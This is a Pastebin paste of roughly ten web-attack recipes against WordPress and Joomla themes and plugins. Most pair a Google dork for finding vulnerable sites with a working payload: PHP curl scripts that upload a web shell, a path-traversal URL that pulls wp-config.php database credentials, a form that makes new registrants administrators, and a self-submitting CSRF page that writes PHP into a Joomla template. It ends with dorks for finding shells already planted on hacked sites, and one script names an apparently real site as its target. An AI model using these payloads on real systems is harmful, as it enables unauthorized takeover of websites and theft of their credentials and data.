Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- YH=YH=YH=ANON=Yh=Yh=yH
- #YassineElHilali
- #1.Exploit Title:WordPress Font Uploader Shell Upload
- Google Dork : inurl:/wp-content/plugins/font-uploader/
- code===>
- <?php
- $uploadfile="yourshellname.php.ttf";
- $ch =
- curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('font'=>"@$uploadfile",
- 'Submit'=>'submit'));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- ========================================================
- #2.Exploit Title:Wordpress plugin Arbitary File Upload All Version
- Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
- ==>after going to your desire site u will find a file/folder [uploadify] u need to click there
- sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
- code==>
- <?php
- $uploadfile="yourshell.php";
- $ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile",
- 'folder'=>'/'));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- ==========================================================
- #3.Exploit Title:Wordpress Atom Themes Arbitary File Upload
- Google Dork : inurl:"/wp-content/themes/atom/"
- code==>
- <?php
- $uploadfile="yourshell.php";
- $ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile",
- 'folder'=>'/'));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php
- =============================================================
- #4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability
- Google Dork:inurl:"/wp-content/themes/soulmedic/"
- http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- ===>u will find database password/name of that server
- ================================================================
- #5.Exploit Title:PHP File Upload Vulnerability
- Google Dork:inurl:images/jupload.php;guest100;guest100
- http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100]
- http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
- if u find uploading option then u can upload your shell
- shell access==>http://www.yourtarget.com/images/shell.php
- ==================================================================
- #6.Exploit Title:Hades+ Framework Add Administrator
- Google multiple Dork: inurl:/wp-content/themes/appius/
- inurl:/wp-content/themes/Consultant/
- inurl:/wp-content/themes/appius1/
- inurl:/wp-content/themes/archin/
- inurl:/wp-content/themes/averin/
- inurl:/wp-content/themes/dagda/
- inurl:/wp-content/themes/echea/
- inurl:/wp-content/themes/felici/
- inurl:/wp-content/themes/kmp/
- inurl:/wp-content/themes/kmp2/
- inurl:/wp-content/themes/liberal/
- inurl:/wp-content/themes/liberal-media-bias/
- inurl:/wp-content/themes/linguini/
- inurl:/wp-content/themes/livewire/
- inurl:/wp-content/themes/majestics/
- inurl:/wp-content/themes/mathis/
- inurl:/wp-content/themes/mazine/
- inurl:/wp-content/themes/Orchestra/
- inurl:/wp-content/themes/shopsum/
- inurl:/wp-content/themes/shotzz/
- inurl:/wp-content/themes/test/
- inurl:/wp-content/themes/Viteeo/
- inurl:/wp-content/themes/vithy/
- inurl:/wp-content/themes/yvora/
- inurl:/wp-content/themes/sodales/
- Exploit:
- <form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
- <input name="values[0][name]" value="users_can_register">
- <input name="values[0][value]" value="1">
- <input name="values[1][name]" value="admin_email">
- <input name="values[1][value]" value="{%YOUR_EMAIL}">
- <input name="values[2][name]" value="default_role">
- <input name="values[2][value]" value="administrator">
- <input name="action" value="save">
- <input type="submit" value="Submit">
- </form>
- Process==>
- 1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
- sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
- 2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form].
- 3. choose your username & email address and register.
- 4. go to your email, you will find your password.
- 5. then login & and upload your shell
- ===============================================================
- #7.Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
- Google Dork: inurl:/wp-content/themes/dandelion/
- Code==>
- <?php
- $uploadfile="yourshell.php";
- $ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php
- =====================================================================
- #8.Exploit Title: Wordpress satoshi Themes Arbitry File Upload
- Google Dork: inurl:/wp-content/satoshi/dandelion/
- Code==>
- <?php
- $uploadfile="yourshell.php";
- $ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('Filedata'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- ========================================================================
- #8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
- <?php
- /**
- * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
- * 3 October 2010
- * jdc
- *
- * How it works - admin template form has no nonce
- * How to exploit - get a logged in admin to click the wrong link ;)
- * Patched in 2.1.7
- */
- // change these
- $target = 'http://localhost/joomla';
- $exploit = '<?php echo phpinfo(); ?>';
- /* page - any one of:
- page_addCategory
- page_addListing
- page_advSearchRedirect
- page_advSearchResults
- page_advSearch
- page_claim
- page_confirmDelete
- page_contactOwner
- page_errorListing
- page_error
- page_gallery
- page_image
- page_index
- page_listAlpha
- page_listing
- page_listListings
- page_ownerListing
- page_print
- page_recommend
- page_replyReview
- page_reportReview
- page_report
- page_searchByResults
- page_searchResults
- page_subCatIndex
- page_usersFavourites
- page_usersReview
- page_writeReview
- sub_alphaIndex
- sub_images
- sub_listingDetails
- sub_listings
- sub_listingSummary
- sub_map
- sub_reviews
- sub_subCats
- */
- $page = 'page_print';
- // don't change these
- $path = '/administrator/index.php';
- $data = array(
- 'pagecontent' => $exploit,
- 'template' => 'm2',
- 'option' => 'com_mtree',
- 'task' => 'save_templatepage',
- 'page' => $page
- );
- ?>
- <html>
- <body>
- <?php if (@$_GET['iframe']) : ?>
- <form id="csrf" action="<?php echo $target.$path; ?>" method="post">
- <?php foreach ($data as $k => $v) : ?>
- <input type="text" value="<?php echo htmlspecialchars($v); ?>"
- name="<?php echo $k; ?>" />
- <?php endforeach; ?>
- <script type="text/javascript">
- document.forms[0].submit();
- </script>
- </form>
- <?php else : ?>
- <h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
- <p>If you were logged in as admin, you just got owned!</p>
- <div style="display:none">
- <iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
- </div>
- <?php endif; ?>
- </body>
- </html>
- #9.Exploit Title:wordpress potential themes vuln upload
- 1.dork: inurl:/wp-content/themes/nuance/
- exploit: /functions/jwpanel/scripts/valums_uploader/php.php
- 2. dork: inurl:/wp-content/themes/lightspeed/
- exploit: /framework/_scripts/valums_uploader/php.php
- 3. dork: inurl:/wp-content/themes/saico/
- exploit: /framework/_scripts/valums_uploader/php.php
- 4. dork: inurl:/wp-content/themes/eptonic/
- exploit: /functions/jwpanel/scripts/valums_uploader/php.php
- 5. dork: inurl:/wp-content/themes/skinizer/
- exploit: /framework/_scripts/valums_uploader/php.php
- 6. dork: inurl:/wp-content/themes/area53/
- exploit: /framework/_scripts/valums_uploader/php.php
- 7. dork: inurl:/wp-content/themes/blinc/
- exploit:/framework/_scripts/valums_uploader/php.php
- csrf from html:
- <form enctype="multipart/form-data"
- action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
- <input type="jpg" name="url" value="./" /><br />
- Please choose a file: <input name="qqfile" type="file" /><br />
- <input type="submit" value="upload" />
- </form>
- it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
- shell link==>
- http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
- http://www.yourtarget.com/wp-content/uploads/shell.php
- #10.Exploit Title:For Noob[Dorking shell]
- b374k m1n1
- Quote:
- google dork :
- intitle:b374k m1n1 inurl:wp-content
- intitle:"index of /" "b374k.php"
- Dorking shell wso
- Quote:
- google dork :
- intitle:"Index of /uploads" "wso.php"
- intitle:"index of /" "wso.php"
- Dorking Shell Madspot
- Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini.
- Quote:
- google dork :
- intitle:Madspot Security site:com
- Dorking Shell 1n73ct10n
- Quote:
- google dork :
- intitle:1n73ct10n inurl:wp-content
- intitle:"index of /" "1n73ct10n.php"]
- ###########################################################################################
- and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload
- But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development
- website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you]
Add Comment
Please, Sign In to add comment